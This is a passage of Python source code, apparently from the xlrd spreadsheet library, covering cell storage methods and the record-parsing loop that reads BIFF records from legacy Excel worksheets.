assert 0 <= rowx < self.utter_max_rows
fmt_info = self.formatting_info
try:
nr = rowx + 1
if self.nrows < nr:
scta = self._cell_types.append
scva = self._cell_values.append
scxa = self._cell_xf_indexes.append
bt = self.bt
bf = self.bf
for _unused in xrange(self.nrows, nr):
scta(bt * 0)
scva([])
if fmt_info:
scxa(bf * 0)
self.nrows = nr
types_row = self._cell_types[rowx]
values_row = self._cell_values[rowx]
if fmt_info:
fmt_row = self._cell_xf_indexes[rowx]
ltr = len(types_row)
if colx >= self.ncols:
self.ncols = colx + 1
num_empty = colx - ltr
if not num_empty:
# most common case: colx == previous colx + 1
# self._put_cell_cells_appended += 1
types_row.append(ctype)
values_row.append(value)
if fmt_info:
fmt_row.append(xf_index)
return
if num_empty > 0:
num_empty += 1
# self._put_cell_row_widenings += 1
# types_row.extend(self.bt * num_empty)
# values_row.extend([''] * num_empty)
# if fmt_info:
# fmt_row.extend(self.bf * num_empty)
types_row[ltr:] = self.bt * num_empty
values_row[ltr:] = [''] * num_empty
if fmt_info:
fmt_row[ltr:] = self.bf * num_empty
types_row[colx] = ctype
values_row[colx] = value
if fmt_info:
fmt_row[colx] = xf_index
except:
print("put_cell", rowx, colx, file=self.logfile)
raise
def put_cell_unragged(self, rowx, colx, ctype, value, xf_index):
if ctype is None:
# we have a number, so look up the cell type
ctype = self._xf_index_to_xl_type_map[xf_index]
# assert 0 <= colx < self.utter_max_cols
# assert 0 <= rowx < self.utter_max_rows
try:
self._cell_types[rowx][colx] = ctype
self._cell_values[rowx][colx] = value
if self.formatting_info:
self._cell_xf_indexes[rowx][colx] = xf_index
except IndexError:
# print >> self.logfile, "put_cell extending", rowx, colx
# self.extend_cells(rowx+1, colx+1)
# self._put_cell_exceptions += 1
nr = rowx + 1
nc = colx + 1
assert 1 <= nc <= self.utter_max_cols
assert 1 <= nr <= self.utter_max_rows
if nc > self.ncols:
self.ncols = nc
# The row self._first_full_rowx and all subsequent rows
# are guaranteed to have length == self.ncols. Thus the
# "fix ragged rows" section of the tidy_dimensions method
# doesn't need to examine them.
if nr < self.nrows:
# cell data is not in non-descending row order *AND*
# self.ncols has been bumped up.
# This very rare case ruins this optmisation.
self._first_full_rowx = -2
elif rowx > self._first_full_rowx > -2:
self._first_full_rowx = rowx
if nr <= self.nrows:
# New cell is in an existing row, so extend that row (if necessary).
# Note that nr < self.nrows means that the cell data
# is not in ascending row order!!
trow = self._cell_types[rowx]
nextra = self.ncols - len(trow)
if nextra > 0:
# self._put_cell_row_widenings += 1
trow.extend(self.bt * nextra)
if self.formatting_info:
self._cell_xf_indexes[rowx].extend(self.bf * nextra)
self._cell_values[rowx].extend([''] * nextra)
else:
scta = self._cell_types.append
scva = self._cell_values.append
scxa = self._cell_xf_indexes.append
fmt_info = self.formatting_info
nc = self.ncols
bt = self.bt
bf = self.bf
for _unused in xrange(self.nrows, nr):
# self._put_cell_rows_appended += 1
scta(bt * nc)
scva([''] * nc)
if fmt_info:
scxa(bf * nc)
self.nrows = nr
# === end of code from extend_cells()
try:
self._cell_types[rowx][colx] = ctype
self._cell_values[rowx][colx] = value
if self.formatting_info:
self._cell_xf_indexes[rowx][colx] = xf_index
except:
print("put_cell", rowx, colx, file=self.logfile)
raise
except:
print("put_cell", rowx, colx, file=self.logfile)
raise
# === Methods after this line neither know nor care about how cells are stored.
def read(self, bk):
global rc_stats
DEBUG = 0
blah = DEBUG or self.verbosity >= 2
blah_rows = DEBUG or self.verbosity >= 4
blah_formulas = 0 and blah
r1c1 = 0
oldpos = bk._position
bk._position = self._position
XL_SHRFMLA_ETC_ETC = (
XL_SHRFMLA, XL_ARRAY, XL_TABLEOP, XL_TABLEOP2,
XL_ARRAY2, XL_TABLEOP_B2,
)
self_put_cell = self.put_cell
local_unpack = unpack
bk_get_record_parts = bk.get_record_parts
bv = self.biff_version
fmt_info = self.formatting_info
do_sst_rich_text = fmt_info and bk._rich_text_runlist_map
rowinfo_sharing_dict = {}
txos = {}
eof_found = 0
while 1:
# if DEBUG: print "SHEET.READ: about to read from position %d" % bk._position
rc, data_len, data = bk_get_record_parts()
# if rc in rc_stats:
# rc_stats[rc] += 1
# else:
# rc_stats[rc] = 1
# if DEBUG: print "SHEET.READ: op 0x%04x, %d bytes %r" % (rc, data_len, data)
if rc == XL_NUMBER:
# [:14] in following stmt ignores extraneous rubbish at end of record.
# Sample file testEON-8.xls supplied by Jan Kraus.
rowx, colx, xf_index, d = local_unpack('<HHHd', data[:14])
# if xf_index == 0:
# fprintf(self.logfile,
# "NUMBER: r=%d c=%d xfx=%d %f\n", rowx, colx, xf_index, d)
self_put_cell(rowx, colx, None, d, xf_index)
elif rc == XL_LABELSST:
rowx, colx, xf_index, sstindex = local_unpack('<HHHi', data)
# print "LABELSST", rowx, colx, sstindex, bk._sharedstrings[sstindex]
self_put_cell(rowx, colx, XL_CELL_TEXT, bk._sharedstrings[sstindex], xf_index)
if do_sst_rich_text:
runlist = bk._rich_text_runlist_map.get(sstindex)
if runlist:
self.rich_text_runlist_map[(rowx, colx)] = runlist
elif rc == XL_LABEL:
rowx, colx, xf_index = local_unpack('<HHH', data[0:6])
if bv < BIFF_FIRST_UNICODE:
strg = unpack_string(data, 6, bk.encoding or bk.derive_encoding(), lenlen=2)
else:
strg = unpack_unicode(data, 6, lenlen=2)
self_put_cell(rowx, colx, XL_CELL_TEXT, strg, xf_index)
elif rc == XL_RSTRING:
rowx, colx, xf_index = local_unpack('<HHH', data[0:6])
if bv < BIFF_FIRST_UNICODE:
strg, pos = unpack_string_update_pos(data, 6, bk.encoding or bk.derive_encoding(), lenlen=2)
nrt = BYTES_ORD(data[pos])
pos += 1
runlist = []
for _unused in xrange(nrt):
runlist.append(unpack('<BB', data[pos:pos+2]))
pos += 2
assert pos == len(data)
else:
strg, pos = unpack_unicode_update_pos(data, 6, lenlen=2)
nrt = unpack('<H', data[pos:pos+2])[0]
pos += 2
runlist = []
for _unused in xrange(nrt):
runlist.append(unpack('<HH', data[pos:pos+4]))
pos += 4
assert pos == len(data)
self_put_cell(rowx, colx, XL_CELL_TEXT, strg, xf_index)
self.rich_text_runlist_map[(rowx, colx)] = runlist
elif rc == XL_RK:
rowx, colx, xf_index = local_unpack('<HHH', data[:6])
d = unpack_RK(data[6:10])
self_put_cell(rowx, colx, None, d, xf_index)
elif rc == XL_MULRK:
mulrk_row, mulrk_first = local_unpack('<HH', data[0:4])
mulrk_last, = local_unpack('<H', data[-2:])
pos = 4
for colx in xrange(mulrk_first, mulrk_last+1):
xf_index, = local_unpack('<H', data[pos:pos+2])
d = unpack_RK(data[pos+2:pos+6])
pos += 6
self_put_cell(mulrk_row, colx, None, d, xf_index)
elif rc == XL_ROW:
# Version 0.6.0a3: ROW records are just not worth using (for memory allocation).
# Version 0.6.1: now used for formatting info.
if not fmt_info: continue
rowx, bits1, bits2 = local_unpack('<H4xH4xi', data[0:16])
if not(0 <= rowx < self.utter_max_rows):
print("*** NOTE: ROW record has row index %d; " \
"should have 0 <= rowx < %d -- record ignored!" \
% (rowx, self.utter_max_rows), file=self.logfile)
continue
key = (bits1, bits2)
r = rowinfo_sharing_dict.get(key)
if r is None:
rowinfo_sharing_dict[key] = r = Rowinfo()
# Using upkbits() is far too slow on a file
# with 30 sheets each with 10K rows :-(
# upkbits(r, bits1, (
# ( 0, 0x7FFF, 'height'),
# (15, 0x8000, 'has_default_height'),
# ))
# upkbits(r, bits2, (
# ( 0, 0x00000007, 'outline_level'),
# ( 4, 0x00000010, 'outline_group_starts_ends'),
# ( 5, 0x00000020, 'hidden'),
# ( 6, 0x00000040, 'height_mismatch'),
# ( 7, 0x00000080, 'has_default_xf_index'),
# (16, 0x0FFF0000, 'xf_index'),
# (28, 0x10000000, 'additional_space_above'),
# (29, 0x20000000, 'additional_space_below'),
# ))
# So:
r.height = bits1 & 0x7fff
r.has_default_height = (bits1 >> 15) & 1
r.outline_level = bits2 & 7
r.outline_group_starts_ends = (bits2 >> 4) & 1
r.hidden = (bits2 >> 5) & 1
r.height_mismatch = (bits2 >> 6) & 1
r.has_default_xf_index = (bits2 >> 7) & 1
r.xf_index = (bits2 >> 16) & 0xfff
r.additional_space_above = (bits2 >> 28) & 1
r.additional_space_below = (bits2 >> 29) & 1
if not r.has_default_xf_index:
r.xf_index = -1
self.rowinfo_map[rowx] = r
if 0 and r.xf_index > -1:
fprintf(self.logfile,
"**ROW %d %d %d\n",
self.number, rowx, r.xf_index)
if blah_rows:
print('ROW', rowx, bits1, bits2, file=self.logfile)
r.dump(self.logfile,
header="--- sh #%d, rowx=%d ---" % (self.number, rowx))
elif rc in XL_FORMULA_OPCODES: # 06, 0206, 0406
# DEBUG = 1
# if DEBUG: print "FORMULA: rc: 0x%04x data: %r" % (rc, data)
if bv >= 50:
rowx, colx, xf_index, result_str, flags = local_unpack('<HHH8sH', data[0:16])
lenlen = 2
tkarr_offset = 20
elif bv >= 30:
rowx, colx, xf_index, result_str, flags = local_unpack('<HHH8sH', data[0:16])
lenlen = 2
tkarr_offset = 16
else: # BIFF2
rowx, colx, cell_attr, result_str, flags = local_unpack('<HH3s8sB', data[0:16])
xf_index = self.fixed_BIFF2_xfindex(cell_attr, rowx, colx)
lenlen = 1
tkarr_offset = 16
if blah_formulas: # testing formula dumper
#### XXXX FIXME
fprintf(self.logfile, "FORMULA: rowx=%d colx=%d\n", rowx, colx)
fmlalen = local_unpack("<H", data[20:22])[0]
decompile_formula(bk, data[22:], fmlalen, FMLA_TYPE_CELL,
browx=rowx, bcolx=colx, blah=1, r1c1=r1c1)
if result_str[6:8] == b"\xFF\xFF":
first_byte = BYTES_ORD(result_str[0])
if first_byte == 0:
# need to read next record (STRING)
gotstring = 0
# if flags & 8:
if 1: # "flags & 8" applies only to SHRFMLA
# actually there's an optional SHRFMLA or ARRAY etc record to skip over
rc2, data2_len, data2 = bk.get_record_parts()
if rc2 == XL_STRING or rc2 == XL_STRING_B2:
gotstring = 1
elif rc2 == XL_ARRAY:
row1x, rownx, col1x, colnx, array_flags, tokslen = \
local_unpack("<HHBBBxxxxxH", data2[:14])
if blah_formulas:
fprintf(self.logfile, "ARRAY: %d %d %d %d %d\n",
row1x, rownx, col1x, colnx, array_flags)
# dump_formula(bk, data2[14:], tokslen, bv, reldelta=0, blah=1)
elif rc2 == XL_SHRFMLA:
row1x, rownx, col1x, colnx, nfmlas, tokslen = \
local_unpack("<HHBBxBH", data2[:10])
if blah_formulas:
fprintf(self.logfile, "SHRFMLA (sub): %d %d %d %d %d\n",
row1x, rownx, col1x, colnx, nfmlas)
decompile_formula(bk, data2[10:], tokslen, FMLA_TYPE_SHARED,
blah=1, browx=rowx, bcolx=colx, r1c1=r1c1)
elif rc2 not in XL_SHRFMLA_ETC_ETC:
raise XLRDError(
"Expected SHRFMLA, ARRAY, TABLEOP* or STRING record; found 0x%04x" % rc2)
# if DEBUG: print "gotstring:", gotstring
# now for the STRING record
if not gotstring:
rc2, _unused_len, data2 = bk.get_record_parts()
if rc2 not in (XL_STRING, XL_STRING_B2):
raise XLRDError("Expected STRING record; found 0x%04x" % rc2)
# if DEBUG: print "STRING: data=%r BIFF=%d cp=%d" % (data2, self.biff_version, bk.encoding)
strg = self.string_record_contents(data2)
self.put_cell(rowx, colx, XL_CELL_TEXT, strg, xf_index)
# if DEBUG: print "FORMULA strg %r" % strg
elif first_byte == 1:
# boolean formula result
value = BYTES_ORD(result_str[2])
self_put_cell(rowx, colx, XL_CELL_BOOLEAN, value, xf_index)
elif first_byte == 2:
# Error in cell
value = BYTES_ORD(result_str[2])
self_put_cell(rowx, colx, XL_CELL_ERROR, value, xf_index)
elif first_byte == 3:
# empty ... i.e. empty (zero-length) string, NOT an empty cell.
self_put_cell(rowx, colx, XL_CELL_TEXT, "", xf_index)
else:
raise XLRDError("unexpected special case (0x%02x) in FORMULA" % first_byte)
else:
# it is a number
d = local_unpack('<d', result_str)[0]
self_put_cell(rowx, colx, None, d, xf_index)
elif rc == XL_BOOLERR:
rowx, colx, xf_index, value, is_err = local_unpack('<HHHBB', data[:8])
# Note OOo Calc 2.0 writes 9-byte BOOLERR records.
# OOo docs say 8. Excel writes 8.
cellty = (XL_CELL_BOOLEAN, XL_CELL_ERROR)[is_err]
# if DEBUG: print "XL_BOOLERR", rowx, colx, xf_index, value, is_err
self_put_cell(rowx, colx, cellty, value, xf_index)
elif rc == XL_COLINFO:
if not fmt_info: continue
c = Colinfo()
first_colx, last_colx, c.width, c.xf_index, flags \
= local_unpack("<HHHHH", data[:10])
#### Colinfo.width is denominated in 256ths of a character,
#### *not* in characters.
if not(0 <= first_colx <= last_colx <= 256):
# Note: 256 instead of 255 is a common mistake.
# We silently ignore the non-existing 257th column in that case.
print("*** NOTE: COLINFO record has first col index %d, last %d; " \
"should have 0 <= first <= last <= 255 -- record ignored!" \
% (first_colx, last_colx), file=self.logfile)
del c
continue
upkbits(c, flags, (
( 0, 0x0001, 'hidden'),
( 1, 0x0002, 'bit1_flag'),
# *ALL* colinfos created by Excel in "default" cases are 0x0002!!
# Maybe it's "locked" by analogy with XFProtection data.
( 8, 0x0700, 'outline_level'),
(12, 0x1000, 'collapsed'),
))
for colx in xrange(first_colx, last_colx+1):
if colx > 255: break # Excel does 0 to 256 inclusive
self.colinfo_map[colx] = c
if 0:
fprintf(self.logfile,
"**COL %d %d %d\n",
self.number, colx, c.xf_index)
if blah:
fprintf(
self.logfile,
"COLINFO sheet #%d cols %d-%d: wid=%d xf_index=%d flags=0x%04x\n",
self.number, first_colx, last_colx, c.width, c.xf_index, flags,
)
c.dump(self.logfile, header='===')
elif rc == XL_DEFCOLWIDTH:
self.defcolwidth, = local_unpack("<H", data[:2])
if 0: print('DEFCOLWIDTH', self.defcolwidth, file=self.logfile)
elif rc == XL_STANDARDWIDTH:
if data_len != 2:
print('*** ERROR *** STANDARDWIDTH', data_len, repr(data), file=self.logfile)
self.standardwidth, = local_unpack("<H", data[:2])
if 0: print('STANDARDWIDTH', self.standardwidth, file=self.logfile)
elif rc == XL_GCW:
if not fmt_info: continue # useless w/o COLINFO
assert data_len == 34
assert data[0:2] == b"\x20\x00"
iguff = unpack("<8i", data[2:34])
gcw = []
for bits in iguff:
for j in xrange(32):
gcw.append(bits & 1)
bits >>= 1
self.gcw = tuple(gcw)
if 0:
showgcw = "".join(map(lambda x: "F "[x], gcw)).rstrip().replace(' ', '.')
print("GCW:", showgcw, file=self.logfile)
elif rc == XL_BLANK:
if not fmt_info: continue
rowx, colx, xf_index = local_unpack('<HHH', data[:6])
# if 0: print >> self.logfile, "BLANK", rowx, colx, xf_index
self_put_cell(rowx, colx, XL_CELL_BLANK, '', xf_index)
elif rc == XL_MULBLANK: # 00BE
if not fmt_info: continue
nitems = data_len >> 1
result = local_unpack("<%dH" % nitems, data)
rowx, mul_first = result[:2]
mul_last = result[-1]
# print >> self.logfile, "MULBLANK", rowx, mul_first, mul_last, data_len, nitems, mul_last + 4 - mul_first
assert nitems == mul_last + 4 - mul_first
pos = 2
for colx in xrange(mul_first, mul_last + 1):
self_put_cell(rowx, colx, XL_CELL_BLANK, '', result[pos])
pos += 1
elif rc == XL_DIMENSION or rc == XL_DIMENSION2:
if data_len == 0:
# Four zero bytes after some other record. See github issue 64.
continue
# if data_len == 10:
# Was crashing on BIFF 4.0 file w/o the two trailing unused bytes.
# Reported by Ralph Heimburger.
if bv < 80:
dim_tuple = local_unpack('<HxxH', data[2:8])
else:
dim_tuple = local_unpack('<ixxH', data[4:12])
self.nrows, self.ncols = 0, 0
self._dimnrows, self._dimncols = dim_tuple
if bv in (21, 30, 40) and self.book.xf_list and not self.book._xf_epilogue_done:
self.book.xf_epilogue()
if blah:
fprintf(self.logfile,
"sheet %d(%r) DIMENSIONS: ncols=%d nrows=%d\n",
self.number, self.name, self._dimncols, self._dimnrows
)
elif rc == XL_HLINK:
self.handle_hlink(data)
elif rc == XL_QUICKTIP:
self.handle_quicktip(data)
elif rc == XL_EOF:
DEBUG = 0
if DEBUG: print("SHEET.READ: EOF", file=self.logfile)
eof_found = 1
break
elif rc == XL_OBJ:
# handle SHEET-level objects; note there's a separate Book.handle_obj
saved_obj = self.handle_obj(data)
if saved_obj: saved_obj_id = saved_obj.id
else: saved_obj_id = None
elif rc == XL_MSO_DRAWING:
self.handle_msodrawingetc(rc, data_len, data)
elif rc == XL_TXO:
txo = self.handle_txo(data)
if txo and saved_obj_id:
txos[saved_obj_id] = txo
saved_obj_id = None
elif rc == XL_NOTE:
self.handle_note(data, txos)
elif rc == XL_FEAT11:
self.handle_feat11(data)
elif rc in bofcodes: ##### EMBEDDED BOF #####
version, boftype = local_unpack('<HH', data[0:4])
if boftype != 0x20: # embedded chart
print("*** Unexpected embedded BOF (0x%04x) at offset %d: version=0x%04x type=0x%04x" \
% (rc, bk._position - data_len - 4, version, boftype), file=self.logfile)
while 1:
code, data_len, data = bk.get_record_parts()
if code == XL_EOF:
break
if DEBUG: print("---> found EOF", file=self.logfile)
elif rc == XL_COUNTRY:
bk.handle_country(data)
elif rc == XL_LABELRANGES:
pos = 0
pos = unpack_cell_range_address_list_update_pos(
self.row_label_ranges, data, pos, bv, addr_size=8,
)
pos = unpack_cell_range_address_list_update_pos(
self.col_label_ranges, data, pos, bv, addr_size=8,
)
assert pos == data_len
elif rc == XL_ARRAY:
row1x, rownx, col1x, colnx, array_flags, tokslen = \
local_unpack("<HHBBBxxxxxH", data[:14])
if blah_formulas:
print("ARRAY:", row1x, rownx, col1x, colnx, array_flags, file=self.logfile)
# dump_formula(bk, data[14:], tokslen, bv, reldelta=0, blah=1)
elif rc == XL_SHRFMLA:
row1x, rownx, col1x, colnx, nfmlas, tokslen = \
local_unpack("<HHBBxBH", data[:10])
if blah_formulas:
print("SHRFMLA (main):", row1x, rownx, col1x, colnx, nfmlas, file=self.logfile)
decompile_formula(bk, data[10:], tokslen, FMLA_TYPE_SHARED,
blah=1, browx=rowx, bcolx=colx, r1c1=r1c1)
elif rc == XL_CONDFMT:
if not fmt_info: continue
assert bv >= 80
num_CFs, needs_recalc, browx1, browx2, bcolx1, bcolx2 = \
unpack("<6H", data[0:12])
if self.verbosity >= 1:
fprintf(self.logfile,
"\n*** WARNING: Ignoring CONDFMT (conditional formatting) record\n" \
"*** in Sheet %d (%r).\n" \
"*** %d CF record(s); needs_recalc_or_redraw = %d\n" \
"*** Bounding box is %s\n",
self.number, self.name, num_CFs, needs_recalc,
rangename2d(browx1, browx2+1, bcolx1, bcolx2+1),
)
olist = [] # updated by the function
pos = unpack_cell_range_address_list_update_pos(
olist, data, 12, bv, addr_size=8)
# print >> self.logfile, repr(result), len(result)
if self.verbosity >= 1:
fprintf(self.logfile,
"*** %d individual range(s):\n" \
"*** %s\n",
len(olist),
", ".join([rangename2d(*coords) for coords in olist]),
)
elif rc == XL_CF:
if not fmt_info: continue
cf_type, cmp_op, sz1, sz2, flags = unpack("<BBHHi", data[0:10])
font_block = (flags >> 26) & 1
bord_block = (flags >> 28) & 1
patt_block = (flags >> 29) & 1
if self.verbosity >= 1:
fprintf(self.logfile,
"\n*** WARNING: Ignoring CF (conditional formatting) sub-record.\n" \
"*** cf_type=%d, cmp_op=%d, sz1=%d, sz2=%d, flags=0x%08x\n" \
"*** optional data blocks: font=%d, border=%d, pattern=%d\n",
cf_type, cmp_op, sz1, sz2, flags,
font_block, bord_block, patt_block,
)
# hex_char_dump(data, 0, data_len, fout=self.logfile)
pos = 12
if font_block:
(font_height, font_options, weight, escapement, underline,
font_colour_index, two_bits, font_esc, font_underl) = \
unpack("<64x i i H H B 3x i 4x i i i 18x", data[pos:pos+118])
font_style = (two_bits > 1) & 1
posture = (font_options > 1) & 1
font_canc = (two_bits > 7) & 1
cancellation = (font_options > 7) & 1
if self.verbosity >= 1:
fprintf(self.logfile,
"*** Font info: height=%d, weight=%d, escapement=%d,\n" \
"*** underline=%d, colour_index=%d, esc=%d, underl=%d,\n" \
"*** style=%d, posture=%d, canc=%d, cancellation=%d\n",
font_height, weight, escapement, underline,
font_colour_index, font_esc, font_underl,
font_style, posture, font_canc, cancellation,
)
pos += 118
if bord_block:
pos += 8
if patt_block:
pos += 4
fmla1 = data[pos:pos+sz1]
pos += sz1
if blah and sz1:
fprintf(self.logfile,
"*** formula 1:\n",
)
dump_formula(bk, fmla1, sz1, bv, reldelta=0, blah=1)
fmla2 = data[pos:pos+sz2]
pos += sz2
assert pos == data_len
if blah and sz2:
fprintf(self.logfile,
"*** formula 2:\n",
)
dump_formula(bk, fmla2, sz2, bv, reldelta=0, blah=1)
elif rc == XL_DEFAULTROWHEIGHT:
if data_len == 4:
bits, self.default_row_height = unpack("<HH", data[:4])
elif data_len == 2:
self.default_row_height, = unpack("<H", data)
bits = 0
fprintf(self.logfile,
"*** WARNING: DEFAULTROWHEIGHT record len is 2, " \
"should be 4; assuming BIFF2 format\n")
else:
bits = 0
fprintf(self.logfile,
"*** WARNING: DEFAULTROWHEIGHT record len is %d, " \
"should be 4; ignoring this record\n",
data_len)
self.default_row_height_mismatch = bits & 1
self.default_row_hidden = (bits >> 1) & 1
self.default_additional_space_above = (bits >> 2) & 1
self.default_additional_space_below = (bits >> 3) & 1
elif rc == XL_MERGEDCELLS:
if not fmt_info: continue
pos = unpack_cell_range_address_list_update_pos(
self.merged_cells, data, 0, bv, addr_size=8)
if blah:
fprintf(self.logfile,
"MERGEDCELLS: %d ranges\n", (pos - 2) // 8)
assert pos == data_len, \
"MERGEDCELLS: pos=%d data_len=%d" % (pos, data_len)
elif rc == XL_WINDOW2:
if bv >= 80 and data_len >= 14:
(options,
self.first_visible_rowx, self.first_visible_colx,
self.gridline_colour_index,
self.cached_page_break_preview_mag_factor,
self.cached_normal_view_mag_factor
) = unpack("<HHHHxxHH", data[:14])
else:
assert bv >= 30 # BIFF3-7
(options,
self.first_visible_rowx, self.first_visible_colx,
) = unpack("<HHH", data[:6])
self.gridline_colour_rgb = unpack("<BBB", data[6:9])
self.gridline_colour_index = nearest_colour_index(
self.book.colour_map, self.gridline_colour_rgb, debug=0)
self.cached_page_break_preview_mag_factor = 0 # default (60%)
self.cached_normal_view_mag_factor = 0 # default (100%)
# options -- Bit, Mask, Contents:
# 0 0001H 0 = Show formula results 1 = Show formulas
# 1 0002H 0 = Do not show grid lines 1 = Show grid lines
# 2 0004H 0 = Do not show sheet headers 1 = Show sheet headers
# 3 0008H 0 = Panes are not frozen 1 = Panes are frozen (freeze)
# 4 0010H 0 = Show zero values as empty cells 1 = Show zero values
# 5 0020H 0 = Manual grid line colour 1 = Automatic grid line colour
# 6 0040H 0 = Columns from left to right 1 = Columns from right to left
# 7 0080H 0 = Do not show outline symbols 1 = Show outline symbols
# 8 0100H 0 = Keep splits if pane freeze is removed 1 = Remove splits if pane freeze is removed
# 9 0200H 0 = Sheet not selected 1 = Sheet selected (BIFF5-BIFF8)
# 10 0400H 0 = Sheet not visible 1 = Sheet visible (BIFF5-BIFF8)
# 11 0800H 0 = Show in normal view 1 = Show in page break preview (BIFF8)
# The freeze flag specifies, if a following PANE record (6.71) describes unfrozen or frozen panes.
for attr, _unused_defval in _WINDOW2_options:
setattr(self, attr, options & 1)
options >>= 1
elif rc == XL_SCL:
num, den = unpack("<HH", data)
result = 0
if den:
result = (num * 100) // den
if not(10 <= result <= 400):
if DEBUG or self.verbosity >= 0:
print((
"WARNING *** SCL rcd sheet %d: should have 0.1 <= num/den <= 4; got %d/%d"
% (self.number, num, den)
), file=self.logfile)
result = 100
self.scl_mag_factor = result
elif rc == XL_PANE:
(
self.vert_split_pos,
self.horz_split_pos,
self.horz_split_first_visible,
self.vert_split_first_visible,
self.split_active_pane,
) = unpack("<HHHHB", data[:9])
self.has_pane_record = 1
elif rc == XL_HORIZONTALPAGEBREAKS:
if not fmt_info: continue
num_breaks, = local_unpack("<H", data[:2])
assert num_breaks * (2 + 4 * (bv >= 80)) + 2 == data_len
pos = 2
if bv < 80:
while pos < data_len:
self.horizontal_page_breaks.append((local_unpack("<H", data[pos:pos+2])[0], 0, 255))
pos += 2
else:
while pos < data_len:
self.horizontal_page_breaks.append(local_unpack("<HHH", data[pos:pos+6]))
pos += 6
elif rc == XL_VERTICALPAGEBREAKS:
if not fmt_info: continue
num_breaks, = local_unpack("<H", data[:2])
assert num_breaks * (2 + 4 * (bv >= 80)) + 2 == data_len
pos = 2
if bv < 80:
while pos < data_len:
self.vertical_page_breaks.append((local_unpack("<H", data[pos:pos+2])[0], 0, 65535))
pos += 2
else:
while pos < data_len:
self.vertical_page_breaks.append(local_unpack("<HHH", data[pos:pos+6]))
pos += 6
#### all of the following are for BIFF <= 4W
elif bv <= 45:
if rc == XL_FORMAT or rc == XL_FORMAT2:
bk.handle_format(data, rc)
elif rc == XL_FONT or rc == XL_FONT_B3B4:
bk.handle_font(data)
elif rc == XL_STYLE:
if not self.book._xf_epilogue_done:
self.book.xf_epilogue()
bk.handle_style(data)
elif rc == XL_PALETTE:
bk.handle_palette(data)
elif rc == XL_BUILTINFMTCOUNT:
bk.handle_builtinfmtcount(data)
elif rc == XL_XF4 or rc == XL_XF3 or rc == XL_XF2: #### N.B. not XL_XF
bk.handle_xf(data)
elif rc == XL_DATEMODE:
bk.handle_datemode(data)
elif rc == XL_CODEPAGE:
bk.handle_codepage(data)
elif rc == XL_FILEPASS:
bk.handle_filepass(data)
elif rc == XL_WRITEACCESS:
bk.handle_writeaccess(data)
elif rc == XL_IXFE:
self._ixfe = local_unpack('<H', data)[0]
elif rc == XL_NUMBER_B2:
rowx, colx, cell_attr, d = local_unpack('<HH3sd', data)
self_put_cell(rowx, colx, None, d, self.fixed_BIFF2_xfindex(cell_attr, rowx, colx))
elif rc == XL_INTEGER:
rowx, colx, cell_attr, d = local_unpack('<HH3sH', data)
self_put_cell(rowx, colx, None, float(d), self.fixed_BIFF2_xfindex(cell_attr, rowx, colx))
elif rc == XL_LABEL_B2:
rowx, colx, cell_attr = local_unpack('<HH3s', data[0:7])
strg = unpack_string(data, 7, bk.encoding or bk.derive_encoding(), lenlen=1)
self_put_cell(rowx, colx, XL_CELL_TEXT, strg, self.fixed_BIFF2_xfindex(cell_attr, rowx, colx))
elif rc == XL_BOOLERR_B2:
rowx, colx, cell_attr, value, is_err = local_unpack('<HH3sBB', data)
cellty = (XL_CELL_BOOLEAN, XL_CELL_ERROR)[is_err]
# if DEBUG: print "XL_BOOLERR_B2", rowx, colx, cell_attr, value, is_err
self_put_cell(rowx, colx, cellty, value, self.fixed_BIFF2_xfindex(cell_attr, rowx, colx))
elif rc == XL_BLANK_B2:
if not fmt_info: continue
rowx, colx, cell_attr = local_unpack('<HH3s', data[:7])
self_put_cell(rowx, colx, XL_CELL_BLANK, '', self.fixed_BIFF2_xfindex(cell_attr, rowx, colx))
elif rc == XL_EFONT:
bk.handle_efont(data)
elif rc == XL_ROW_B2:
if not fmt_info: continue
rowx, bits1, bits2 = local_unpack('<H4xH2xB', data[0:11])
if not(0 <= rowx < self.utter_max_rows):
print("*** NOTE: ROW_B2 record has row index %d; " \
"should have 0 <= rowx < %d -- record ignored!" \
% (rowx, self.utter_max_rows), file=self.logfile)
continue
if not (bits2 & 1): # has_default_xf_index is false
xf_index = -1
elif data_len == 18:
# Seems the XF index in the cell_attr is dodgy
xfx = local_unpack('<H', data[16:18])[0]
xf_index = self.fixed_BIFF2_xfindex(cell_attr=None, rowx=rowx, colx=-1, true_xfx=xfx)
else:
cell_attr = data[13:16]
xf_index = self.fixed_BIFF2_xfindex(cell_attr, rowx, colx=-1)
key = (bits1, bits2, xf_index)
r = rowinfo_sharing_dict.get(key)
if r is None:
rowinfo_sharing_dict[key] = r = Rowinfo()
r.height = bits1 & 0x7fff
r.has_default_height = (bits1 >> 15) & 1
r.has_default_xf_index = bits2 & 1
r.xf_index = xf_index
# r.outline_level = 0 # set in __init__
# r.outline_group_starts_ends = 0 # set in __init__
# r.hidden = 0 # set in __init__
# r.height_mismatch = 0 # set in __init__
# r.additional_space_above = 0 # set in __init__
# r.additional_space_below = 0 # set in __init__
self.rowinfo_map[rowx] = r
if 0 and r.xf_index > -1:
fprintf(self.logfile,
"**ROW %d %d %d\n",
self.number, rowx, r.xf_index)
if blah_rows:
print('ROW_B2', rowx, bits1, has_defaults, file=self.logfile)
r.dump(self.logfile,
header="--- sh #%d, rowx=%d ---" % (self.number, rowx))
elif rc == XL_COLWIDTH: # BIFF2 only
if not fmt_info: continue
first_colx, last_colx, width\
= local_unpack("<BBH", data[:4])
if not(first_colx <= last_colx):
print("*** NOTE: COLWIDTH record has first col index %d, last %d; " \
"should have first <= last -- record ignored!" \
% (first_colx, last_colx), file=self.logfile)
continue
for colx in xrange(first_colx, last_colx+1):
if colx in self.colinfo_map:
c = self.colinfo_map[colx]
else:
c = Colinfo()
self.colinfo_map[colx] = c
c.width = width
if blah:
fprintf(
self.logfile,
"COLWIDTH sheet #%d cols %d-%d: wid=%d\n",
self.number, first_colx, last_colx, width
)
elif rc == XL_COLUMNDEFAULT: # BIFF2 only
if not fmt_info: continue
first_colx, last_colx = local_unpack("<HH", data[:4])
#### Warning OOo docs wrong; first_colx <= colx < last_colx
if blah:
fprintf(
self.logfile,
"COLUMNDEFAULT sheet #%d cols in range(%d, %d)\n",
self.number, first_colx, last_colx
)
if not(0 <= first_colx < last_colx <= 256):
print("*** NOTE: COLUMNDEFAULT record has first col index %d, last %d; " \
"should have 0 <= first < last <= 256" \
% (first_colx, last_colx), file=self.logfile)
last_colx = min(last_colx, 256)
for colx in xrange(first_colx, last_colx):
offset = 4 + 3 * (colx - first_colx)
cell_attr = data[offset:offset+3]
xf_index = self.fixed_BIFF2_xfindex(cell_attr, rowx=-1, colx=colx)
if colx in self.colinfo_map:
c = self.colinfo_map[colx]
else:
